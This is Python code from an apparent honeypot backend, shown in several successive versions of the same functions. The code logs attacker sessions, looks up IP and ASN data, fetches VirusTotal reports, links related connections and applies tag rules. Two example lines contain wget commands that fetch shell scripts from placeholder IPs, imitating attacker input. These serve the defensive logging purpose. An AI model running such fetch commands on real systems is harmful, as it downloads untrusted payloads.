def get_ip_range_online(self, ip):
    addinfo = additionalinfo.get_ip_info(ip)

    # TODO: Ugly hack
    range = IPRange(ip_min=1, ip_max=2)
    range.country = addinfo["country"]
    range.city = ""
    range.latitude = 0
    range.longitude = 0
    range.asn_id = int(addinfo["asn"])
    range.asn = self._get_asn(range.asn_id)
    range.cidr = addinfo["ipblock"]

    return range
def put_session(self, session):
    ipinfo = get_ip_info(session["ip"])
    asn = None
    block = None
    country = None
    if ipinfo:
        asn_obj = self.get_asn(ipinfo["asn"])
        asn = ipinfo["asn"]
        block = ipinfo["ipblock"]
        country = ipinfo["country"]

    s_id = self.db.put_conn(session["ip"], session["user"], session["pass"],
                            session["date"], session["text_combined"],
                            asn, block, country)

    req_urls = []
    for url in session["urls"]:
        db_url = self.db.get_url(url).fetchone()
        url_id = 0

        if db_url == None:
            url_ip, url_info = get_url_info(url)
            url_asn = None
            url_country = None
            if url_info:
                asn_obj_url = self.get_asn(url_info["asn"])
                url_asn = url_info["asn"]
                url_country = url_info["country"]

            url_id = self.db.put_url(url, session["date"], url_ip, url_asn,
                                     url_country)
            req_urls.append(url)
        elif db_url["sample"] == None:
            req_urls.append(url)
            url_id = db_url["id"]
        else:
            # Sample exists already
            # TODO: Check url for oldness
            url_id = db_url["id"]

        self.db.link_conn_url(s_id, url_id)

    return req_urls
def get_ip_range_online(self, ip):
    addinfo = additionalinfo.get_ip_info(ip)

    if addinfo:
        # TODO: Ugly hack
        range = type('', (object, ), {})()
        range.country = addinfo["country"]
        range.city = "Unknown"
        range.latitude = 0
        range.longitude = 0
        range.asn_id = int(addinfo["asn"])
        range.asn = self._get_asn(range.asn_id)
        range.cidr = addinfo["ipblock"]

        return range
    else:
        return None
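# Illustrative aside (not part of the backend code): the "ugly hack" above uses
# type('', (object, ), {})() to build an anonymous object that accepts arbitrary
# attribute assignment. A sketch of the same idea with types.SimpleNamespace
# (Python 3), using purely hypothetical values:
import types

ip_range = types.SimpleNamespace(country="DE", city="Unknown",
                                 latitude=0, longitude=0,
                                 asn_id=3320, asn=None, cidr="192.0.2.0/24")
print(ip_range.country, ip_range.cidr)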
def put_session(self, session):
    ipinfo = None
    asn = None
    block = None
    country = None

    if self.do_ip_to_asn_resolution:
        ipinfo = get_ip_info(session["ip"])
        if ipinfo:
            asn_obj = self.get_asn(ipinfo["asn"])
            asn = ipinfo["asn"]
            block = ipinfo["ipblock"]
            country = ipinfo["country"]

    report = {}
    if self.vt != None:
        if self.web.get_ip_report(session["ip"]) == None:
            report = self.vt.query_ip_reports(session["ip"])
            ipReport = IpReport(ip=session["ip"], report=json.dumps(report))
            self.session.add(ipReport)

    # Calculate "hash"
    connhash = ""
    for event in session["stream"]:
        if event["in"]:
            line = event["data"]
            line = ''.join(char for char in line
                           if ord(char) < 128 and ord(char) > 32)
            if line != "":
                linehash = abs(hash(line)) % 0xFFFF
                connhash += struct.pack("!H", linehash)
    connhash = connhash.encode("hex")

    backend_user = self.session.query(User).filter(
        User.username == session["backend_username"]).first()

    conn = Connection(ip=session["ip"],
                      user=session["user"],
                      date=session["date"],
                      password=session["pass"],
                      stream=json.dumps(session["stream"]),
                      asn_id=asn,
                      ipblock=block,
                      country=country,
                      connhash=connhash,
                      backend_user_id=backend_user.id)
    self.session.add(conn)
    self.session.flush()

    req_urls = []
    set_urls = set(session["urls"])
    for url in set_urls:
        db_url = self.db.get_url(url).fetchone()
        url_id = 0

        report = ''
        parsed_uri = urlparse(url)
        domain = '{uri.netloc}'.format(uri=parsed_uri)
        if self.vt != None:
            report = self.vt.query_domain_reports(domain)
            domainReport = DomainReport(domain=domain,
                                        report=json.dumps(report))
            self.session.add(domainReport)

        if db_url == None:
            url_ip = None
            url_asn = None
            url_country = None

            if self.do_ip_to_asn_resolution:
                url_ip, url_info = get_url_info(url)
                if url_info:
                    asn_obj_url = self.get_asn(url_info["asn"])
                    url_asn = url_info["asn"]
                    url_country = url_info["country"]

            url_id = self.db.put_url(url, session["date"], url_ip, url_asn,
                                     url_country)
            req_urls.append(url)
        elif db_url["sample"] == None:
            req_urls.append(url)
            url_id = db_url["id"]
        else:
            # Sample exists already
            # TODO: Check url for oldness
            url_id = db_url["id"]

        self.db.link_conn_url(conn.id, url_id)

    # Find previous connections
    # A connection is associated when:
    #  - same honeypot/user
    #  - connection happened as long as 120s before
    #  - same client ip OR same username/password combo
    assoc_timediff = 120
    previous_conns = (self.session.query(Connection).filter(
        Connection.date > (conn.date - assoc_timediff),
        or_(
            and_(Connection.user == conn.user,
                 Connection.password == conn.password),
            Connection.ip == conn.ip),
        Connection.backend_user_id == conn.backend_user_id,
        Connection.id != conn.id).all())

    for prev in previous_conns:
        conn.conns_before.append(prev)

    # Check connection against all tags
    tags = self.session.query(Tag).all()
    conn = self.session.query(Connection).filter(
        Connection.id == conn.id).first()
    for tag in tags:
        json_obj = conn.json(depth=0)
        json_obj["text_combined"] = filter_ascii(json_obj["text_combined"])
        if simple_eval(tag.code, names=json_obj) == True:
            self.db.link_conn_tag(conn.id, tag.id)

    return req_urls
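# Illustrative sketch (assumption, not the backend's own helper): the connhash
# above folds every inbound line of the session stream, reduced to printable
# ASCII, into a 16-bit hash and hex-encodes the concatenation, so sessions that
# type the same commands end up with the same hash. A Python 3 flavoured
# version using binascii.hexlify in place of the Python 2 str.encode("hex"):
import binascii
import struct

def connhash_sketch(stream):
    connhash = b""
    for event in stream:
        if event["in"]:
            line = ''.join(c for c in event["data"] if 32 < ord(c) < 128)
            if line:
                connhash += struct.pack("!H", abs(hash(line)) % 0xFFFF)
    return binascii.hexlify(connhash).decode("ascii")

# Note: in Python 3, str hashes are randomized per process unless
# PYTHONHASHSEED is fixed, so this sketch is only stable within one run;
# the original Python 2 hash() was deterministic.
# connhash_sketch([{"in": True, "data": "wget http://198.51.100.7/x.sh\r\n"}])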
def put_session(self, session):
    ipinfo = None
    asn = None
    block = None
    country = None
    network_id = None

    if self.do_ip_to_asn_resolution:
        ipinfo = get_ip_info(session["ip"])
        if ipinfo:
            asn_obj = self.get_asn(ipinfo["asn"])
            asn = ipinfo["asn"]
            block = ipinfo["ipblock"]
            country = ipinfo["country"]

    # Calculate "hash"
    connhash = ""
    for event in session["stream"]:
        if event["in"]:
            line = event["data"]
            line = ''.join(char for char in line
                           if ord(char) < 128 and ord(char) > 32)
            if line != "":
                linehash = abs(hash(line)) % 0xFFFF
                connhash += struct.pack("!H", linehash)
    connhash = connhash.encode("hex")

    backend_user = self.session.query(User).filter(
        User.username == session["backend_username"]).first()

    conn = Connection(ip=session["ip"],
                      user=session["user"],
                      date=session["date"],
                      password=session["pass"],
                      stream=json.dumps(session["stream"]),
                      asn_id=asn,
                      ipblock=block,
                      country=country,
                      connhash=connhash,
                      backend_user_id=backend_user.id)
    self.session.add(conn)
    self.session.flush()  # to get id

    samples = []
    urls = []
    for sample_json in session["samples"]:
        sample, url = self.create_url_sample(sample_json)

        if network_id == None and sample.network_id != None:
            network_id = sample.network_id
        if network_id == None and url.network_id != None:
            network_id = url.network_id

        conn.urls.append(url)
        samples.append(sample)
        urls.append(url)

    # Find previous connections
    # A connection is associated when:
    #  - same honeypot/user
    #  - connection happened as long as 120s before
    #  - same client ip OR same username/password combo
    assoc_timediff = 120
    previous_conns = (self.session.query(Connection).filter(
        Connection.date > (conn.date - assoc_timediff),
        or_(
            and_(Connection.user == conn.user,
                 Connection.password == conn.password),
            Connection.ip == conn.ip),
        Connection.backend_user_id == conn.backend_user_id,
        Connection.id != conn.id).all())

    for prev in previous_conns:
        if network_id == None and prev.network_id != None:
            network_id = prev.network_id
        conn.conns_before.append(prev)

    # Check connection against all tags
    tags = self.session.query(Tag).all()
    for tag in tags:
        json_obj = conn.json(depth=0)
        json_obj["text_combined"] = filter_ascii(json_obj["text_combined"])
        if simple_eval(tag.code, names=json_obj) == True:
            self.db.link_conn_tag(conn.id, tag.id)

    # Only create new networks for connections with urls or associated conns,
    # to prevent the creation of thousands of networks.
    # NOTE: only conns with network == NULL will get their network updated
    # later, so we should only create a network where we cannot easily
    # change it later
    if (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None:
        network_id = self.create_network().id

    # Update network on self
    conn.network_id = network_id

    # Update network on all added Urls
    for url in urls:
        if url.network_id == None:
            url.network_id = network_id

    # Update network on all added Samples
    for sample in samples:
        if sample.network_id == None:
            sample.network_id = network_id

    # Update network on all previous connections without one
    if network_id != None:
        for prev in previous_conns:
            if prev.network_id == None:
                prev.network_id = network_id

    self.session.flush()

    return []
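# Illustrative sketch (assumption): the association rule used above, written as
# a plain predicate instead of a SQLAlchemy filter. A previous connection is
# associated when it hit the same honeypot user at most 120 seconds earlier and
# shares either the client IP or the username/password combination.
ASSOC_TIMEDIFF = 120  # seconds, as in the query above

def is_associated(conn, prev):
    return (prev.id != conn.id
            and prev.backend_user_id == conn.backend_user_id
            and prev.date > conn.date - ASSOC_TIMEDIFF
            and (prev.ip == conn.ip
                 or (prev.user == conn.user
                     and prev.password == conn.password)))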
def put_session(self, session):
    ipinfo = get_ip_info(session["ip"])
    asn = None
    block = None
    country = None
    if ipinfo:
        asn_obj = self.get_asn(ipinfo["asn"])
        asn = ipinfo["asn"]
        block = ipinfo["ipblock"]
        country = ipinfo["country"]

    # Calculate "hash"
    connhash = ""
    for line in session["text_in"].split("\n"):
        line = line.strip()
        linehash = abs(hash(line)) % 0xFFFF
        connhash += struct.pack("!H", linehash)
    connhash = connhash.encode("hex")

    backend_user = self.session.query(User).filter(
        User.username == session["backend_username"]).first()

    conn = Connection(ip=session["ip"],
                      user=session["user"],
                      date=session["date"],
                      password=session["pass"],
                      text_combined=session["text_combined"],
                      asn_id=asn,
                      ipblock=block,
                      country=country,
                      connhash=connhash,
                      backend_user_id=backend_user.id)
    self.session.add(conn)
    self.session.flush()

    req_urls = []
    for url in session["urls"]:
        db_url = self.db.get_url(url).fetchone()
        url_id = 0

        if db_url == None:
            url_ip, url_info = get_url_info(url)
            url_asn = None
            url_country = None
            if url_info:
                asn_obj_url = self.get_asn(url_info["asn"])
                url_asn = url_info["asn"]
                url_country = url_info["country"]

            url_id = self.db.put_url(url, session["date"], url_ip, url_asn,
                                     url_country)
            req_urls.append(url)
        elif db_url["sample"] == None:
            req_urls.append(url)
            url_id = db_url["id"]
        else:
            # Sample exists already
            # TODO: Check url for oldness
            url_id = db_url["id"]

        self.db.link_conn_url(conn.id, url_id)

    # Find previous connections
    # A connection is associated when:
    #  - same honeypot/user
    #  - connection happened as long as 120s before
    #  - same client ip OR same username/password combo
    assoc_timediff = 120
    previous_conns = (self.session.query(Connection).filter(
        Connection.date > (conn.date - assoc_timediff),
        or_(
            and_(Connection.user == conn.user,
                 Connection.password == conn.password),
            Connection.ip == conn.ip),
        Connection.backend_user_id == conn.backend_user_id,
        Connection.id != conn.id).all())

    for prev in previous_conns:
        conn.conns_before.append(prev)

    # Check connection against all tags
    tags = self.session.query(Tag).all()
    conn = self.session.query(Connection).filter(
        Connection.id == conn.id).first()
    for tag in tags:
        json_obj = conn.json(depth=0)
        json_obj["text_combined"] = filter_ascii(json_obj["text_combined"])
        if simple_eval(tag.code, names=json_obj) == True:
            self.db.link_conn_tag(conn.id, tag.id)

    return req_urls
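# Illustrative sketch (assumption): the tag check above uses the simpleeval
# library to evaluate each tag's stored expression against the connection's
# JSON representation. A minimal standalone example of that pattern, with a
# hypothetical connection dict and tag expression:
from simpleeval import simple_eval

conn_json = {"user": "root", "country": "CN",
             "text_combined": "wget http://203.0.113.9/bot.sh"}
tag_code = "user == 'root' and country == 'CN'"

if simple_eval(tag_code, names=conn_json):
    print("tag matches this connection")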